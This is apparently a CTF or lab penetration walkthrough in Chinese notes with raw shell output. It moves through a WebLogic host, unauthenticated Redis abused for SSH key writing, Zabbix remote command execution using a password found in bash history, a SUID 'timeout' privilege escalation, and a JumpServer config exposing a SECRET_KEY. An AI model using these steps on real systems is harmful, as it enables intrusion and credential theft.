-rw-rw-r--. 1 weblogic weblogic 691 Apr 23 07:25 datagram-test.sh
-rw-rw-r--. 1 weblogic weblogic 583 Apr 23 07:25 multicast-test.cmd
-rw-rw-r--. 1 weblogic weblogic 694 Apr 23 07:25 multicast-test.sh
-rw-rw-r--. 1 weblogic weblogic 546 Apr 23 07:25 optimize.reg
-rw-rw-r--. 1 weblogic weblogic 1108 Apr 23 07:25 query.cmd
-rw-rw-r--. 1 weblogic weblogic 1208 Apr 23 07:25 query.sh
-rw-rw-r--. 1 weblogic weblogic 976 Apr 23 07:25 readme.txt
# ps -ef
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 May20 ? 00:00:03 /usr/lib/systemd/systemd --switched-root --system --deserialize 21
root 2 0 0 May20 ? 00:00:00 [kthreadd]
root 4 2 0 May20 ? 00:00:00 [kworker/0:0H]
root 5 2 0 May20 ? 00:00:00 [kworker/u4:0]
root 6 2 0 May20 ? 00:00:00 [ksoftirqd/0]
root 7 2 0 May20 ? 00:00:00 [migration/0]
root 8 2 0 May20 ? 00:00:00 [rcu_bh]
root 9 2 0 May20 ? 00:00:00 [rcu_sched]
root 10 2 0 May20 ? 00:00:00 [lru-add-drain]
root 11 2 0 May20 ? 00:00:00 [watchdog/0]
root 12 2 0 May20 ? 00:00:00 [watchdog/1]
root 13 2 0 May20 ? 00:00:00 [migration/1]
root 14 2 0 May20 ? 00:00:00 [ksoftirqd/1]
root 16 2 0 May20 ? 00:00:00 [kworker/1:0H]
root 18 2 0 May20 ? 00:00:00 [kdevtmpfs]
root 19 2 0 May20 ? 00:00:00 [netns]
root 20 2 0 May20 ? 00:00:00 [khungtaskd]
root 21 2 0 May20 ? 00:00:00 [writeback]
root 22 2 0 May20 ? 00:00:00 [kintegrityd]
root 23 2 0 May20 ? 00:00:00 [bioset]
root 24 2 0 May20 ? 00:00:00 [bioset]
root 25 2 0 May20 ? 00:00:00 [bioset]
root 26 2 0 May20 ? 00:00:00 [kblockd]
root 27 2 0 May20 ? 00:00:00 [md]
root 28 2 0 May20 ? 00:00:00 [edac-poller]
root 29 2 0 May20 ? 00:00:00 [watchdogd]
root 36 2 0 May20 ? 00:00:00 [kswapd0]
root 37 2 0 May20 ? 00:00:00 [ksmd]
root 38 2 0 May20 ? 00:00:00 [khugepaged]
root 39 2 0 May20 ? 00:00:00 [crypto]
root 47 2 0 May20 ? 00:00:00 [kthrotld]
root 48 2 0 May20 ? 00:00:00 [kworker/u4:1]
root 49 2 0 May20 ? 00:00:00 [kmpath_rdacd]
root 50 2 0 May20 ? 00:00:00 [kaluad]
root 52 2 0 May20 ? 00:00:00 [kpsmoused]
root 53 2 0 May20 ? 00:00:00 [kworker/0:2]
root 54 2 0 May20 ? 00:00:00 [ipv6_addrconf]
root 67 2 0 May20 ? 00:00:00 [deferwq]
root 120 2 0 May20 ? 00:00:00 [kauditd]
root 201 2 0 May20 ? 00:00:00 [rpciod]
root 202 2 0 May20 ? 00:00:00 [xprtiod]
root 263 2 0 May20 ? 00:00:00 [ata_sff]
root 276 2 0 May20 ? 00:00:00 [scsi_eh_0]
root 277 2 0 May20 ? 00:00:00 [scsi_tmf_0]
root 279 2 0 May20 ? 00:00:00 [scsi_eh_1]
root 280 2 0 May20 ? 00:00:00 [kworker/1:1H]
root 282 2 0 May20 ? 00:00:00 [scsi_tmf_1]
root 294 2 0 May20 ? 00:00:00 [bioset]
root 295 2 0 May20 ? 00:00:00 [xfsalloc]
root 296 2 0 May20 ? 00:00:00 [xfs_mru_cache]
root 297 2 0 May20 ? 00:00:00 [xfs-buf/vda1]
root 298 2 0 May20 ? 00:00:00 [xfs-data/vda1]
root 299 2 0 May20 ? 00:00:00 [xfs-conv/vda1]
root 300 2 0 May20 ? 00:00:00 [xfs-cil/vda1]
root 301 2 0 May20 ? 00:00:00 [xfs-reclaim/vda]
root 302 2 0 May20 ? 00:00:00 [xfs-log/vda1]
root 303 2 0 May20 ? 00:00:00 [xfs-eofblocks/v]
root 304 2 0 May20 ? 00:00:00 [xfsaild/vda1]
root 305 2 0 May20 ? 00:00:00 [kworker/0:1H]
root 403 1 0 May20 ? 00:00:00 /usr/lib/systemd/systemd-journald
root 440 1 0 May20 ? 00:00:00 /usr/lib/systemd/systemd-udevd
root 472 1 0 May20 ? 00:00:00 /sbin/auditd
root 478 2 0 May20 ? 00:00:00 [hwrng]
root 538 2 0 May20 ? 00:00:00 [ttm_swap]
root 552 2 0 May20 ? 00:00:00 [kvm-irqfd-clean]
polkitd 554 1 0 May20 ? 00:00:00 /usr/lib/polkit-1/polkitd --no-debug
root 556 1 0 May20 ? 00:00:00 /usr/bin/qemu-ga --method=virtio-serial --path=/dev/virtio-ports/org.qemu.guest_agent.0 --blacklist=guest-file-open,guest-file-close,guest-file-read,guest-file-write,guest-file-seek,guest-file-flush,guest-exec,guest-exec-status -F/etc/qemu-ga/fsfreeze-hook
rpc 557 1 0 May20 ? 00:00:00 /sbin/rpcbind -w
root 566 1 0 May20 ? 00:00:00 /usr/sbin/sshd -D
root 568 1 0 May20 ? 00:00:00 /usr/sbin/rsyslogd -n
root 571 1 0 May20 ? 00:00:00 /usr/sbin/irqbalance --foreground
root 585 1 0 May20 ? 00:00:00 /usr/sbin/gssproxy -D
dbus 586 1 0 May20 ? 00:00:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root 587 1 0 May20 ? 00:00:00 /bin/sh /home/weblogic/Oracle/Middleware/user_projects/domains/base_domain/startWebLogic.sh
chrony 595 1 0 May20 ? 00:00:00 /usr/sbin/chronyd
root 596 587 0 May20 ? 00:00:00 /bin/sh /home/weblogic/Oracle/Middleware/user_projects/domains/base_domain/bin/startWebLogic.sh
root 616 1 0 May20 ? 00:00:00 /usr/bin/python2 -Es /usr/sbin/tuned -l -P
root 618 1 0 May20 ? 00:00:00 /usr/lib/systemd/systemd-logind
root 683 1 0 May20 ? 00:00:00 /usr/sbin/crond -n
root 691 1 0 May20 tty1 00:00:00 /sbin/agetty --noclear tty1 linux
root 693 1 0 May20 ttyS0 00:00:00 /sbin/agetty --keep-baud 115200,38400,9600 ttyS0 vt220
root 800 596 0 May20 ? 00:00:17 /usr/lib/jvm/java-1.7.0-openjdk-1.7.0.261-2.6.22.2.el7_8.x86_64/bin/java -Xms512m -Xmx512m -Dweblogic.Name=AdminServer -Djava.security.policy=/home/weblogic/Oracle/Middleware/wlserver_10.3/server/lib/weblogic.policy -da -Dplatform.home=/home/weblogic/Oracle/Middleware/wlserver_10.3 -Dwls.home=/home/weblogic/Oracle/Middleware/wlserver_10.3/server -Dweblogic.home=/home/weblogic/Oracle/Middleware/wlserver_10.3/server -Dweblogic.management.discover=true -Dwlw.iterativeDev= -Dwlw.testConsole= -Dwlw.logErrorsToConsole= -Dweblogic.ext.dirs=/home/weblogic/Oracle/Middleware/patch_wls1036/profiles/default/sysext_manifest_classpath:/home/weblogic/Oracle/Middleware/patch_ocp371/profiles/default/sysext_manifest_classpath weblogic.Server
root 817 1 0 May20 ? 00:00:00 /usr/libexec/postfix/master -w
postfix 827 817 0 May20 ? 00:00:00 pickup -l -t unix -u
postfix 828 817 0 May20 ? 00:00:00 qmgr -l -t unix -u
root 986 2 0 May20 ? 00:00:00 [dio/vda1]
root 1305 2 0 00:01 ? 00:00:00 [kworker/0:1]
find / -mtime -30 -type f -exec grep "flag{" {} +找不到 flag 在哪,人麻了
(后来才知道这台机器就没 flag,啥也不说太蠢了
改密码 ssh 登上去看算了
echo "root:miaotony111"|chpasswd 内网
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1450 qdisc pfifo_fast state UP group default qlen 1000
link/ether 52:54:42:26:4c:87 brd ff:ff:ff:ff:ff:ff
inet 10.103.132.0/16 brd 10.103.255.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::5054:42ff:fe26:4c87/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1450 qdisc pfifo_fast state UP group default qlen 1000
link/ether 52:54:5b:1b:d9:6e brd ff:ff:ff:ff:ff:ff
inet 192.168.33.77/24 brd 192.168.33.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::5054:5bff:fe1b:d96e/64 scope link
valid_lft forever preferred_lft forever
(icmp) Target 192.168.33.77 is alive
(icmp) Target 192.168.33.55 is alive
(icmp) Target 192.168.33.127 is alive
(icmp) Target 192.168.33.149 is alive
[*] Icmp alive hosts len is: 4
192.168.33.77:7001 open
192.168.33.55:6379 open
192.168.33.127:3306 open
192.168.33.149:80 open
192.168.33.127:80 open
192.168.33.149:22 open
192.168.33.127:22 open
192.168.33.55:22 open
192.168.33.77:22 open
[*] alive ports len is: 9
start vulscan
[*] WebTitle: http://192.168.33.149 code:200 len:13906 title:None
[*] WebTitle: http://192.168.33.127 code:403 len:4897 title:Apache HTTP Server Test Page powered by CentOS
[+] Redis:192.168.33.55:6379 unauthorized file://dump.rdb
[+] Redis:192.168.33.55:6379 like can write /root/.ssh/
[+] Redis:192.168.33.55:6379 like can write /var/spool/cron/
[*] WebTitle: http://192.168.33.77:7001 code:404 len:1164 title:Error 404--Not Found
[+] InfoScan:http://192.168.33.77:7001 [weblogic]flag1 192.168.33.55:6379 redis
直接写公钥好了
./fscan_amd64 -h 192.168.33.55 -rf id_ed25519.pub
连上去拿 flag
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1450 qdisc pfifo_fast state UP group default qlen 1000
link/ether 52:54:1d:7a:2e:db brd ff:ff:ff:ff:ff:ff
inet 10.103.173.192/16 brd 10.103.255.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::5054:1dff:fe7a:2edb/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1450 qdisc pfifo_fast state UP group default qlen 1000
link/ether 52:54:4f:1b:b8:25 brd ff:ff:ff:ff:ff:ff
inet 192.168.33.55/24 brd 192.168.33.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::5054:4fff:fe1b:b825/64 scope link
valid_lft forever preferred_lft forever还有个 10.103.173.192 内网啊? 感觉只是大内网重复了?(后来和技术支持确认了就是入口机器共用的网段
(icmp) Target 10.103.173.192 is alive
(icmp) Target 10.103.173.125 is alive
[*] Icmp alive hosts len is: 2
10.103.173.192:6379 open
10.103.173.192:22 open
10.103.173.125:3306 open
10.103.173.125:80 open
10.103.173.125:22 open
[*] alive ports len is: 5
start vulscan
[*] WebTitle: http://10.103.173.125 code:403 len:4897 title:Apache HTTP Server Test Page powered by CentOS
[+] Redis:10.103.173.192:6379 unauthorized file://dump.rdb
[+] Redis:10.103.173.192:6379 like can write /root/.ssh/
[+] Redis:10.103.173.192:6379 like can write /var/spool/cron/# history
1 #!/bin/bash
2 #repo.sh
3 git clone https://github.com/program/repo.git
48 #database
49 sudo apt install mysql-server mysql-client
50 sudo mysql_secure_installation
51 sudo mysql
52 CREATE DATABASE my_db;
53 CREATE USER 'my_user' IDENTIFIED BY 'password';
54 GRANT ALL ON my_db.* TO 'my_user';
55 FLUSH PRIVILEGES;
56 exit
57 mysql -u my_user -p
58 SHOW DATABASES;
59 #gitlab
60 sudo apt install gitlab-ce
61 sudo gitlab-ctl reconfigure
62 curl http://192.168.33.127 -u Admin -p bQqYfe5eqN2CttsV
63 cd /home/user1
64 mkdir scripts
65 cd scripts
66 nano script1.sh
67 chmod +x script1.sh
68 ./script1.sh
345 cd /usr/local/redis-3.2.2/
346 ls
347 vim redis.conf
348 src/redis-server redis.confflag2 192.168.33.127 Zabbix
入口机器的历史记录里有一条
curl http://192.168.33.127 -u Admin -p bQqYfe5eqN2CttsV
拿这个用户名密码去登录
Zabbix 5.0.33 后台可以下发执行指令
先添加一下自己想要执行的脚本
jumpserver 192.168.33.149: 10050
Zabbix server 127.0.0.1: 10050
id; whoami; ps -ef; ls -al /root; cat /root/flag; case $? in [01]) true;; *) false;; esac
uid=997(zabbix) gid=994(zabbix) groups=994(zabbix)
zabbix
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 14:15 ? 00:00:03 /usr/lib/systemd/systemd --switched-root --system --deserialize 21
root 2 0 0 14:15 ? 00:00:00 [kthreadd]
root 4 2 0 14:15 ? 00:00:00 [kworker/0:0H]
root 6 2 0 14:15 ? 00:00:00 [ksoftirqd/0]
root 7 2 0 14:15 ? 00:00:00 [migration/0]
root 8 2 0 14:15 ? 00:00:00 [rcu_bh]
root 9 2 0 14:15 ? 00:00:00 [rcu_sched]
root 10 2 0 14:15 ? 00:00:00 [lru-add-drain]
root 11 2 0 14:15 ? 00:00:00 [watchdog/0]
root 12 2 0 14:15 ? 00:00:00 [watchdog/1]
root 13 2 0 14:15 ? 00:00:00 [migration/1]
root 14 2 0 14:15 ? 00:00:00 [ksoftirqd/1]
root 16 2 0 14:15 ? 00:00:00 [kworker/1:0H]
root 18 2 0 14:15 ? 00:00:00 [kdevtmpfs]
root 19 2 0 14:15 ? 00:00:00 [netns]
root 20 2 0 14:15 ? 00:00:00 [khungtaskd]
root 21 2 0 14:15 ? 00:00:00 [writeback]
root 22 2 0 14:15 ? 00:00:00 [kintegrityd]
root 23 2 0 14:15 ? 00:00:00 [bioset]
root 24 2 0 14:15 ? 00:00:00 [bioset]
root 25 2 0 14:15 ? 00:00:00 [bioset]
root 26 2 0 14:15 ? 00:00:00 [kblockd]
root 27 2 0 14:15 ? 00:00:00 [md]
root 28 2 0 14:15 ? 00:00:00 [edac-poller]
root 29 2 0 14:15 ? 00:00:00 [watchdogd]
root 35 2 0 14:15 ? 00:00:00 [kswapd0]
root 36 2 0 14:15 ? 00:00:00 [ksmd]
root 37 2 0 14:15 ? 00:00:00 [khugepaged]
root 38 2 0 14:15 ? 00:00:00 [crypto]
root 46 2 0 14:15 ? 00:00:00 [kthrotld]
root 47 2 0 14:15 ? 00:00:00 [kworker/u4:1]
root 48 2 0 14:15 ? 00:00:00 [kmpath_rdacd]
root 49 2 0 14:15 ? 00:00:00 [kaluad]
root 50 2 0 14:15 ? 00:00:00 [kworker/1:1]
root 52 2 0 14:15 ? 00:00:00 [kpsmoused]
root 53 2 0 14:15 ? 00:00:00 [kworker/1:2]
root 54 2 0 14:15 ? 00:00:00 [ipv6_addrconf]
root 67 2 0 14:15 ? 00:00:00 [deferwq]
root 131 2 0 14:15 ? 00:00:00 [kauditd]
root 199 2 0 14:15 ? 00:00:00 [rpciod]
root 200 2 0 14:15 ? 00:00:00 [xprtiod]
root 263 2 0 14:15 ? 00:00:00 [kworker/u4:2]
root 267 2 0 14:15 ? 00:00:00 [ata_sff]
root 275 2 0 14:15 ? 00:00:00 [scsi_eh_0]
root 276 2 0 14:15 ? 00:00:00 [scsi_tmf_0]
root 277 2 0 14:15 ? 00:00:00 [kworker/0:1H]
root 279 2 0 14:15 ? 00:00:00 [scsi_eh_1]
root 280 2 0 14:15 ? 00:00:00 [scsi_tmf_1]
root 292 2 0 14:15 ? 00:00:00 [bioset]
root 293 2 0 14:15 ? 00:00:00 [xfsalloc]
root 294 2 0 14:15 ? 00:00:00 [xfs_mru_cache]
root 295 2 0 14:15 ? 00:00:00 [xfs-buf/vda1]
root 296 2 0 14:15 ? 00:00:00 [xfs-data/vda1]
root 297 2 0 14:15 ? 00:00:00 [xfs-conv/vda1]
root 298 2 0 14:15 ? 00:00:00 [xfs-cil/vda1]
root 299 2 0 14:15 ? 00:00:00 [xfs-reclaim/vda]
root 300 2 0 14:15 ? 00:00:00 [xfs-log/vda1]
root 301 2 0 14:15 ? 00:00:00 [xfs-eofblocks/v]
root 302 2 0 14:15 ? 00:00:01 [xfsaild/vda1]
root 303 2 0 14:15 ? 00:00:00 [kworker/1:1H]
root 400 1 0 14:15 ? 00:00:00 /usr/lib/systemd/systemd-journald
root 433 1 0 14:15 ? 00:00:00 /usr/lib/systemd/systemd-udevd
root 467 2 0 14:15 ? 00:00:00 [hwrng]
root 479 1 0 14:15 ? 00:00:00 /sbin/auditd
root 526 2 0 14:15 ? 00:00:00 [kvm-irqfd-clean]
root 531 2 0 14:15 ? 00:00:00 [ttm_swap]
root 552 1 0 14:15 ? 00:00:00 /usr/sbin/irqbalance --foreground
rpc 553 1 0 14:15 ? 00:00:00 /sbin/rpcbind -w
root 555 1 0 14:15 ? 00:00:00 php-fpm: master process (/etc/opt/rh/rh-php72/php-fpm.conf)
root 556 1 0 14:15 ? 00:00:00 /usr/bin/qemu-ga --method=virtio-serial --path=/dev/virtio-ports/org.qemu.guest_agent.0 --blacklist=guest-file-open,guest-file-close,guest-file-read,guest-file-write,guest-file-seek,guest-file-flush,guest-exec,guest-exec-status -F/etc/qemu-ga/fsfreeze-hook
root 559 1 0 14:15 ? 00:00:00 /usr/sbin/rsyslogd -n
root 562 1 0 14:15 ? 00:00:00 /usr/lib/systemd/systemd-logind
polkitd 563 1 0 14:15 ? 00:00:00 /usr/lib/polkit-1/polkitd --no-debug
dbus 564 1 0 14:15 ? 00:00:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root 576 1 0 14:15 ? 00:00:00 /usr/bin/python2 -Es /usr/sbin/tuned -l -P
root 581 1 0 14:15 ? 00:00:00 /usr/sbin/sshd -D
chrony 594 1 0 14:15 ? 00:00:00 /usr/sbin/chronyd
zabbix 604 1 0 14:15 ? 00:00:00 /usr/sbin/zabbix_agentd -c /etc/zabbix/zabbix_agentd.conf
zabbix 612 604 0 14:15 ? 00:00:00 /usr/sbin/zabbix_agentd: collector [idle 1 sec]
zabbix 613 604 0 14:15 ? 00:00:00 /usr/sbin/zabbix_agentd: listener #1 [waiting for connection]
zabbix 614 604 0 14:15 ? 00:00:00 /usr/sbin/zabbix_agentd: listener #2 [waiting for connection]
zabbix 615 604 0 14:15 ? 00:00:00 /usr/sbin/zabbix_agentd: listener #3 [waiting for connection]
zabbix 616 604 0 14:15 ? 00:00:00 /usr/sbin/zabbix_agentd: active checks #1 [idle 1 sec]
root 623 1 0 14:15 ? 00:00:00 /usr/sbin/gssproxy -D
root 648 1 0 14:15 ? 00:00:00 /usr/sbin/httpd -DFOREGROUND
apache 655 555 0 14:15 ? 00:00:00 php-fpm: pool www
apache 656 555 0 14:15 ? 00:00:00 php-fpm: pool www
apache 657 555 0 14:15 ? 00:00:00 php-fpm: pool www
apache 659 555 0 14:15 ? 00:00:00 php-fpm: pool www
root 660 1 0 14:15 tty1 00:00:00 /sbin/agetty --noclear tty1 linux
apache 661 555 0 14:15 ? 00:00:00 php-fpm: pool www
apache 664 555 0 14:15 ? 00:00:05 php-fpm: pool zabbix
apache 665 555 0 14:15 ? 00:00:06 php-fpm: pool zabbix
root 672 1 0 14:15 ? 00:00:00 /usr/sbin/crond -n
apache 673 555 0 14:15 ? 00:00:05 php-fpm: pool zabbix
apache 676 555 0 14:15 ? 00:00:05 php-fpm: pool zabbix
apache 677 555 0 14:15 ? 00:00:05 php-fpm: pool zabbix
root 680 1 0 14:15 ttyS0 00:00:00 /sbin/agetty --keep-baud 115200,38400,9600 ttyS0 vt220
mysql 691 1 0 14:15 ? 00:00:00 /bin/sh /usr/bin/mysqld_safe --basedir=/usr
apache 777 648 0 14:15 ? 00:00:00 /usr/sbin/httpd -DFOREGROUND
apache 778 648 0 14:15 ? 00:00:00 /usr/sbin/httpd -DFOREGROUND
apache 782 648 0 14:15 ? 00:00:00 /usr/sbin/httpd -DFOREGROUND
mysql 959 691 0 14:15 ? 00:00:16 /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib64/mysql/plugin --log-error=/var/log/mariadb/mariadb.log --pid-file=/var/run/mariadb/mariadb.pid --socket=/var/lib/mysql/mysql.sock
root 990 1 0 14:15 ? 00:00:00 /usr/libexec/postfix/master -w
postfix 991 990 0 14:15 ? 00:00:00 pickup -l -t unix -u
postfix 992 990 0 14:15 ? 00:00:00 qmgr -l -t unix -u
zabbix 1176 1 0 14:15 ? 00:00:00 /usr/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix 1183 1176 0 14:15 ? 00:00:00 /usr/sbin/zabbix_server: configuration syncer [synced configuration in 0.041190 sec, idle 60 sec]
zabbix 1188 1176 0 14:15 ? 00:00:00 /usr/sbin/zabbix_server: alert manager #1 [sent 0, failed 0 alerts, idle 5.004719 sec during 5.004815 sec]
zabbix 1189 1176 0 14:15 ? 00:00:00 /usr/sbin/zabbix_server: alerter #1 started
zabbix 1190 1176 0 14:15 ? 00:00:00 /usr/sbin/zabbix_server: alerter #2 started
zabbix 1192 1176 0 14:15 ? 00:00:00 /usr/sbin/zabbix_server: alerter #3 started
zabbix 1193 1176 0 14:15 ? 00:00:00 /usr/sbin/zabbix_server: preprocessing manager #1 [queued 0, processed 7 values, idle 5.001578 sec during 5.001778 sec]
zabbix 1194 1176 0 14:15 ? 00:00:00 /usr/sbin/zabbix_server: preprocessing worker #1 started
zabbix 1195 1176 0 14:15 ? 00:00:00 /usr/sbin/zabbix_server: preprocessing worker #2 started
zabbix 1196 1176 0 14:15 ? 00:00:00 /usr/sbin/zabbix_server: preprocessing worker #3 started
zabbix 1197 1176 0 14:15 ? 00:00:00 /usr/sbin/zabbix_server: lld manager #1 [processed 0 LLD rules, idle 5.002123sec during 5.002194 sec]
zabbix 1198 1176 0 14:15 ? 00:00:00 /usr/sbin/zabbix_server: lld worker #1 [processed 1 LLD rules, idle 1534.422826 sec during 1534.485957 sec]
zabbix 1199 1176 0 14:15 ? 00:00:00 /usr/sbin/zabbix_server: lld worker #2 [processed 1 LLD rules, idle 3089.100561 sec during 3089.433959 sec]
zabbix 1200 1176 0 14:15 ? 00:00:00 /usr/sbin/zabbix_server: housekeeper [deleted 21259 hist/trends, 0 items/triggers, 0 events, 0 sessions, 0 alarms, 0 audit items, 0 records in 4.599678 sec, idle for 1 h
zabbix 1201 1176 0 14:15 ? 00:00:00 /usr/sbin/zabbix_server: timer #1 [updated 0 hosts, suppressed 0 events in 0.000441 sec, idle 59 sec]
zabbix 1203 1176 0 14:15 ? 00:00:00 /usr/sbin/zabbix_server: http poller #1 [got 0 values in 0.000817 sec, idle 5 sec]
zabbix 1205 1176 0 14:15 ? 00:00:00 /usr/sbin/zabbix_server: discoverer #1 [processed 0 rules in 0.000404 sec, idle 60 sec]
zabbix 1207 1176 0 14:15 ? 00:00:00 /usr/sbin/zabbix_server: history syncer #1 [processed 0 values, 0 triggers in 0.000024 sec, idle 1 sec]
zabbix 1208 1176 0 14:15 ? 00:00:00 /usr/sbin/zabbix_server: history syncer #2 [processed 0 values, 0 triggers in 0.000013 sec, idle 1 sec]
zabbix 1209 1176 0 14:15 ? 00:00:00 /usr/sbin/zabbix_server: history syncer #3 [processed 0 values, 0 triggers in 0.000021 sec, idle 1 sec]
zabbix 1210 1176 0 14:15 ? 00:00:00 /usr/sbin/zabbix_server: history syncer #4 [processed 1 values, 0 triggers in 0.008000 sec, idle 1 sec]
zabbix 1211 1176 0 14:15 ? 00:00:00 /usr/sbin/zabbix_server: escalator #1 [processed 0 escalations in 0.001004 sec, idle 3 sec]
zabbix 1212 1176 0 14:15 ? 00:00:00 /usr/sbin/zabbix_server: proxy poller #1 [exchanged data with 0 proxies in 0.000038 sec, idle 5 sec]
zabbix 1213 1176 0 14:15 ? 00:00:00 /usr/sbin/zabbix_server: self-monitoring [processed data in 0.000025 sec, idle 1 sec]
zabbix 1215 1176 0 14:15 ? 00:00:00 /usr/sbin/zabbix_server: task manager [processed 0 task(s) in 0.000201 sec, idle 5 sec]
zabbix 1216 1176 0 14:15 ? 00:00:00 /usr/sbin/zabbix_server: poller #1 [got 0 values in 0.000185 sec, idle 1 sec]
zabbix 1219 1176 0 14:15 ? 00:00:00 /usr/sbin/zabbix_server: poller #2 [got 0 values in 0.000028 sec, idle 1 sec]
zabbix 1221 1176 0 14:15 ? 00:00:00 /usr/sbin/zabbix_server: poller #3 [got 1 values in 0.000427 sec, idle 1 sec]
zabbix 1222 1176 0 14:15 ? 00:00:00 /usr/sbin/zabbix_server: poller #4 [got 0 values in 0.000028 sec, idle 1 sec]
zabbix 1223 1176 0 14:15 ? 00:00:00 /usr/sbin/zabbix_server: poller #5 [got 0 values in 0.000021 sec, idle 1 sec]
zabbix 1224 1176 0 14:15 ? 00:00:00 /usr/sbin/zabbix_server: unreachable poller #1 [got 0 values in 0.000015 sec, idle 5 sec]
zabbix 1226 1176 0 14:15 ? 00:00:00 /usr/sbin/zabbix_server: trapper #1 [processed data in 0.000280 sec, waiting for connection]
zabbix 1228 1176 0 14:15 ? 00:00:00 /usr/sbin/zabbix_server: trapper #2 [processed data in 0.001824 sec, waiting for connection]
zabbix 1229 1176 0 14:15 ? 00:00:00 /usr/sbin/zabbix_server: trapper #3 [processing data]
zabbix 1230 1176 0 14:15 ? 00:00:00 /usr/sbin/zabbix_server: trapper #4 [processed data in 0.000252 sec, waiting for connection]
zabbix 1234 1176 0 14:15 ? 00:00:00 /usr/sbin/zabbix_server: trapper #5 [processed data in 0.000352 sec, waiting for connection]
zabbix 1235 1176 0 14:15 ? 00:00:00 /usr/sbin/zabbix_server: icmp pinger #1 [got 0 values in 0.000017 sec, idle 5 sec]
zabbix 1236 1176 0 14:15 ? 00:00:00 /usr/sbin/zabbix_server: alert syncer [queued 0 alerts(s), flushed 0 result(s) in 0.000829 sec, idle 1 sec]
apache 1365 648 0 14:26 ? 00:00:00 /usr/sbin/httpd -DFOREGROUND
apache 1366 648 0 14:26 ? 00:00:00 /usr/sbin/httpd -DFOREGROUND
apache 1394 648 0 14:29 ? 00:00:00 /usr/sbin/httpd -DFOREGROUND
apache 1395 648 0 14:29 ? 00:00:00 /usr/sbin/httpd -DFOREGROUND
apache 1396 648 0 14:29 ? 00:00:00 /usr/sbin/httpd -DFOREGROUND
apache 1413 555 0 14:30 ? 00:00:05 php-fpm: pool zabbix
apache 1686 648 0 14:50 ? 00:00:00 /usr/sbin/httpd -DFOREGROUND
root 1844 2 0 14:56 ? 00:00:00 [kworker/0:2]
root 1966 1 0 15:01 ? 00:00:00 /usr/sbin/anacron -s
apache 2012 555 0 15:01 ? 00:00:02 php-fpm: pool zabbix
root 2023 2 0 15:02 ? 00:00:00 [kworker/0:0]
apache 2030 555 0 15:02 ? 00:00:02 php-fpm: pool zabbix
apache 2034 648 0 15:02 ? 00:00:00 /usr/sbin/httpd -DFOREGROUND
root 2365 2 0 15:12 ? 00:00:00 [kworker/0:1]
zabbix 2427 1229 0 15:15 ? 00:00:00 sh -c id; whoami; ps -ef; ls -al /root; cat /root/flag; case $? in [01]) true;; *) false;; esac
zabbix 2430 2427 0 15:15 ? 00:00:00 ps -ef
ls: cannot open directory /root: Permission denied
cat: /root/flag: Permission denied弹 shell,然后借助 suid 权限提权,拿 flag
bash-4.2$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/timeout
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/crontab
/usr/bin/passwd
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/usernetctl
/usr/sbin/mount.nfs
/usr/sbin/fping
/usr/sbin/fping6
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/libexec/dbus-1/dbus-daemon-launch-helper
bash-4.2$ timeout 1 cat /root/flag
timeout 1 cat /root/flag
flag{RdboeEj0Xml3D9KSCOyigYIansFJ8LVW}flag3 192.168.33.149 JumpServer 开源堡垒机
不是 之前那个 jumpserver 远程命令执行RCE漏洞
https://paper.seebug.org/1502/
https://github.com/Skactor/jumpserver_rce 打不通
先上线 zabbix
http://192.168.33.127/zabbix/hosts.php
克隆个 Zabbix server 模板,然后直接改 ip 成 192.168.33.149
弹了 zabbix server shell 连上去,发现这机器上面没有 zabbix_get。。
不过好在后台可以执行,在 配置-主机-监控项 里面,直接搜 vfs.file
然后 clone 一个
发现不在 /etc/zabbix/zabbix_agentd.conf
而是
vfs.file.contents[/opt/jumpserver/config/config.txt]
# JumpServer configuration file example.
#
# 如果不了解用途可以跳过修改此配置文件, 系统会自动填入
# 完整参数文档 https://docs.jumpserver.org/zh/master/admin-guide/env/
################################## 镜像配置 ###################################
#
# 国内连接 docker.io 会超时或下载速度较慢, 开启此选项使用华为云镜像加速
# 取代旧版本 DOCKER_IMAGE_PREFIX
#
# DOCKER_IMAGE_MIRROR=1
################################## 安装配置 ###################################
#
# JumpServer 数据库持久化目录, 默认情况下录像、任务日志都在此目录
# 请根据实际情况修改, 升级时备份的数据库文件(.sql)和配置文件也会保存到该目录
#
VOLUME_DIR=/data/jumpserver
# 加密密钥, 迁移请保证 SECRET_KEY 与旧环境一致, 请勿使用特殊字符串
# (*) Warning: Keep this value secret.
# (*) 勿向任何人泄露 SECRET_KEY
#
SECRET_KEY=MjcxMzE5ZjYtZTE4YS0xMWVkLTk5MDYtYWMxZjZiZGYyOTM0
